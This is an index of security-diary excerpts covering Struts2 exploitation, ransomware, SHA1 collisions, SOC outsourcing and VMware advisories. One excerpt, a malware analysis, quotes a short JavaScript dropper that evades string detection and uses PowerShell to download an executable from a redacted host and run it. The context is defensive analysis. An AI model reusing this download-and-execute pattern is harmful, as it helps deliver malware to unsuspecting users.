In a previous diary, I explained how pictures may affect your website reputation[1]. Although asuggestedrecommendation was to prevent cross-linking by using the HTTP referer, this is a control that I do not implement on my personal blog, purely for research purposes. And it successfully worked! My website and all its components are constantly monitored but …
Read more “Tracking Website Defacers with HTTP Referers, (Fri, Apr 7th)”
[We do have a special webcast about the Struts2 Vulnerability scheduled for 11am ET today. Sign up here] Since about a month, we are tracking numerous attempts to exploit the Java Struts2 vulnerability (%%cve:2017-5638%%). Typically, the exploits targeted Unix systems with simple Perlbackdoors and bots. But recently, I saw a number of exploit attempts targeting …
Read more “Java Struts2 Vulnerability Used To Install Cerber Crypto Ransomware, (Thu, Apr 6th)”
As a defender, take the time to put yourself in the place of a bad guy for a few minutes. Youre writing some malicious code and you need to download payloads from the Internet or hide your code on a website. Once your malicious code spread in the wild, it will be quickly captured by …
Read more “Whitelists: The Holy Grail of Attackers, (Wed, Apr 5th)”
Industrial control systems are sensitive systems that must make decisions in real time to ensure the operation of the industrial process they govern. The latency and reliability in packet transmission is fundamental, since the protocols are connection-oriented but because of the main speed goal, many of them do not have included error recovery schemes other …
[This is a guest diary by Paul Bolton] First I it is not a new attack against sha1. When Google announced a sha1 collision in February (here) it reminded me of a detour I took in Nov 2015 when downloading some software, which I think is relevant when we consider these types of announcements. We …
Read more “A Practical Use for a SHA1 Collision, (Mon, Apr 3rd)”
I have been looking for a while for inline proxy that is easy to setup and manage and a co-worker suggested trying IPFire[1]. IPFire is a Linux based hardened OS compiled from sources and takes about 15 minutes to do the basic installation. Before starting, you need to determine how many interfaces (zones) you need …
Read more “IPFire – A Household Multipurpose Security Gateway, (Sun, Apr 2nd)”
Im involved in a project to deploy a SIEM (Security Information Event Management) / SOC (Security Operation Center) for a customer. The current approach is to outsource the services to an external company also called a MSSP (Managed Security Services Provider). We had an interesting chat about the pro con to have an internal or …
Read more “Pro & Con of Outsourcing your SOC, (Fri, Mar 31st)”
Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small Javascript sample with only 2 lines of code: var d=new ActiveXObject(Shell.NormandApplication.replace(Normand, d.ShellExecute(PowerShell,((New-Object System.Net.WebClient).DownloadFile(http://[redacted].exe, xwing.pifStart-Process xwing.pif,, There is no real obfuscation here, just atrick to avoid the detection of the string Shell.Application which often searched by automated tools Sometimes, there …
Read more “Diverting built-in features for the bad, (Thu, Mar 30th)”
VMware released a security bulletin[1] with moderate to critical vulnerabilities. The following products are affected: ESXi Workstation Fusion The vulnerabilities may allow a guest to execute code on the host, may lead to a DDoS or information leakage (depending on the product and version). Patches are available. [1]https://www.vmware.com/security/advisories/VMSA-2017-0006.html Xavier Mertens (@xme) ISC Handler – Freelance …
Read more “Critical VMware vulnerabilities disclosed, (Wed, Mar 29th)”
Today, I would like to review an example how we can improve our daily security operations or, for our users, how to help in detecting suspicious content. Last week, I received the following email in my corporate mailbox. The mail is written in French but easy to understand: It is a notification regarding a failed …
Read more “Logical & Physical Security Correlation, (Tue, Mar 28th)”